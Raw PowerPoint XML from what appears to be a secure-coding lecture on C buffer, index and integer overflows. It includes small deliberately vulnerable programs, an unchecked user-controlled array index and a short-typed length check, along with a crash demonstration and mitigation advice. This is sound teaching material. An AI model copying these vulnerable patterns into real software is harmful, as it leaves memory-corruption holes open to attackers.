              <a:t>[2], 512);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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Checking password %s for user %s\n", password, username);      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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74822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115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115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1159">
                                            <p:txEl>
                                              <p:pRg st="16" end="1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1159">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1159">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1159">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1159">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01159">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01159">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01159">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01159">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01159">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01159">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01159">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01159">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01159">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011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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Non-terminated String Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some functions, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, limit the amount of data copied in the destination buffer but do not include a terminating zero when the limit is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If adjacent buffers are not null-terminated it is possible to cause the copying of an excessive amount of information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21855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0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0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Always make sure that strings are null-terminated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160953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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Index Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This type of overflow exploits the lack of boundary checks in the value used to index an array</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> particularly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easy to exploit because they allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>direct assignment of memory values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that depending on the type of array it is possible to modify only memory values that conform to the data structure in the array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171810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9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9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99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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417639"/>
            <a:ext cx="8229600" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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argc</a:t>
            </a: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argv</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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[8];                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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index</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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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value</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index =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strtol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1], NULL, 10); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  value =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strtoul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[2], NULL, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  array[index] = value;                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>arrayoverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"AAAAAAAA" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135130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09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09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09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09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09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0979">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5097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5097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5097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5097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5097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50979">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50979">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50979">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509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Always check that array indexes that can be controlled by user input are within the array’s bounds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788100663"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows are caused by unexpected results when comparing, casting, and adding integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>short x = 0x7FFF; x++; /* x is now -32768 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>unsigned short x = 0xFFFF; x++ /* x is now 0 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>unsigned long l; short x = -2; l = x; /* l is now 4294967294 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076191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7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7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7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7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7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4466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  long max;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;                                                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  max = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("max %d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %d\n", max, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt; max) {                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }                                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
